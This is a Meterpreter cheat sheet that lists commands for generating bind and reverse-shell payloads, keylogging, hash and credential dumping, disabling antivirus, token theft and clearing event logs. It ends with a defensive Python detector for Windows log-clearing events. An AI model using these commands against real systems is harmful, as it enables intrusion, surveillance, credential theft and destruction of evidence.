Meterpreter Cheat Sheet
version: 0.1
Executing Meterpreter
As a Metasploit exploit payload: (bind_tcp) for a bind shell or (reverse_tcp) for a reverse shell.
As a standalone binary to be uploaded and executed on the target system:
  ./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > meterpreter.exe   (Bind Shell)
  ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=<IP> E
  ./msfpayload windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 X > meterpreter.exe   (Reverse Shell)
  ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=443 E

User Interface Commands
meterpreter> idletime
Displays how long the user has been inactive
meterpreter> keyscan_start
Starts recording the user's key typing
meterpreter> keyscan_dump
Dumps the user's recorded keystrokes
meterpreter> keyscan_stop
Stops recording the user's typing

Core Commands
meterpreter> background
Puts the Meterpreter session in background mode. The session can be recovered by typing:
  sessions -l             (to identify the session ID)
  sessions -i <Session ID>
meterpreter> use <library>
Loads extra Meterpreter functionality from the following loadable libraries:
  espia      Allows desktop spying through screenshots
  incognito  Allows user impersonation commands
  priv       Allows filesystem and hash dumping commands
  sniffer    Allows network sniffing interaction commands
meterpreter> run <script>
Executes self-developed Ruby Meterpreter scripts, such as:
  checkvm, credcollect, get_local_subnets, getcountermeasure, getgui, gettelnet, hashdump, keylogrecorder, killav, metsvc, migrate, netenum, prefetchtool, vnc_oneport / vnc, scheduleme, winenum
meterpreter> irb
Opens the Meterpreter scripting (interactive Ruby) shell

File System Commands
meterpreter> getwd
Obtain the current working directory on the server (target) side
meterpreter> getlwd
Obtain the local current working directory
meterpreter> edit <file>
Edit the given file
meterpreter> del <file>
Deletes the given file
meterpreter> cat <file>
Read the given file
meterpreter> upload <src file> <dst file>
Upload a file to the target host
meterpreter> download <src file> <dst file>
Download a file from the target host

System Commands
meterpreter> sysinfo
Provides information about the target host
meterpreter> getuid
Obtain the username that owns the current process
meterpreter> kill <pid>
Kill the process identified by the given PID
meterpreter> ps
List all running processes
meterpreter> execute -f <file> [Options]
Execute the given file on the target host OS. Options:
  -H  Create the process hidden from view
  -a  Arguments to pass to the command
  -i  Interact with the process after creating it
  -m  Execute from memory
  -t  Execute the process with the currently impersonated thread token
meterpreter> clearev
Clears and securely removes the event logs
meterpreter> shell
Obtain an interactive Windows OS shell
meterpreter> steal_token
Attempts to steal an impersonation token from the target process
meterpreter> reg <Command> [Options]
Interact with the target's Windows Registry using the following commands and options:
  Commands:
    enumkey                Enumerate the supplied registry key
    createkey / deletekey  Create/delete the supplied registry key
    setval / queryval      Set/query values in the supplied registry key
  Options:
    -d  Data to store in the registry value
    -k  The registry key
    -v  The registry value name

Networking Commands
meterpreter> portfwd
Establish port forwarding connections through Meterpreter tunnels. Options:
  -L  Local host to listen on
  -l  Local port to listen on
  -p  Remote port to connect to
  -r  Remote host to connect to
meterpreter> ipconfig
Displays network interface information
meterpreter> route
View and modify the networking routing table
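The event-log clearing command listed under System Commands (clearev, spelled "clearav" in some copies of this sheet) is one of the few actions on this page that leaves a reliable trace for defenders: when the Security log is cleared, Windows writes event ID 1102 (provider Microsoft-Windows-Eventlog) into the fresh Security log, and clearing the System or Application log writes event ID 104 into the System log. The following detector is an added example written for this cheat sheet; it is not Metasploit code. It runs over a constructed list of sample records, flags the "log cleared" events, and groups hits that fall within a few seconds of each other, since several logs cleared in one burst is a stronger signal of scripted clearing than an administrator clearing a single log. The Event dataclass and the sample records are assumptions of this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable


@dataclass(frozen=True)
class Event:
    """One Windows event record as a SIEM or agent might hand it over."""
    timestamp: datetime
    channel: str      # log the record was read from (Security, System, ...)
    provider: str     # event source / provider name
    event_id: int
    message: str


# (channel, provider, event_id) triples that Windows emits when a log is cleared.
LOG_CLEARED_SIGNATURES = {
    ("Security", "Microsoft-Windows-Eventlog", 1102),  # "The audit log was cleared."
    ("System", "Microsoft-Windows-Eventlog", 104),     # "The <name> log file was cleared."
}


def is_log_cleared(ev: Event) -> bool:
    """True when the record is a Windows 'log cleared' notification."""
    return (ev.channel, ev.provider, ev.event_id) in LOG_CLEARED_SIGNATURES


def find_cleared_logs(events: Iterable[Event]) -> list[Event]:
    """Return every 'log cleared' record, oldest first."""
    return sorted((ev for ev in events if is_log_cleared(ev)), key=lambda e: e.timestamp)


def cleared_bursts(events: Iterable[Event],
                   window: timedelta = timedelta(seconds=10)) -> list[list[Event]]:
    """Group 'log cleared' records so that consecutive hits no more than
    `window` apart land in the same burst. A burst that spans several logs
    is the pattern a tool that wipes all logs at once produces."""
    bursts: list[list[Event]] = []
    for ev in find_cleared_logs(events):
        if bursts and ev.timestamp - bursts[-1][-1].timestamp <= window:
            bursts[-1].append(ev)
        else:
            bursts.append([ev])
    return bursts


def burst_summary(burst: list[Event]) -> str:
    """Human-readable one-liner for an alert: when, how many, which logs."""
    logs = ", ".join(sorted({ev.message for ev in burst}))
    return f"{burst[0].timestamp:%Y-%m-%d %H:%M:%S}: {len(burst)} log(s) cleared: {logs}"


# Constructed sample records for this example (not real telemetry).
SAMPLE_EVENTS = [
    Event(datetime(2024, 1, 15, 10, 0, 0), "Security",
          "Microsoft-Windows-Security-Auditing", 4624,
          "An account was successfully logged on."),
    Event(datetime(2024, 1, 15, 10, 5, 1), "Security",
          "Microsoft-Windows-Eventlog", 1102, "The audit log was cleared."),
    Event(datetime(2024, 1, 15, 10, 5, 2), "System",
          "Microsoft-Windows-Eventlog", 104, "The System log file was cleared."),
    Event(datetime(2024, 1, 15, 10, 5, 2), "System",
          "Microsoft-Windows-Eventlog", 104, "The Application log file was cleared."),
    Event(datetime(2024, 1, 15, 10, 30, 0), "System",
          "Service Control Manager", 7036,
          "The Print Spooler service entered the running state."),
]

if __name__ == "__main__":
    for burst in cleared_bursts(SAMPLE_EVENTS):
        print("ALERT", burst_summary(burst))
```

Feed the detector records from whatever collector you already have (Sysmon forwarding, a SIEM export, or `Get-WinEvent` output mapped onto the Event fields); the three signature triples are the only Windows-specific knowledge it encodes. Because clearing wipes the history that preceded it, the alert is most useful when logs are forwarded off the host as they are written, so the events before the 1102/104 markers survive on the collector.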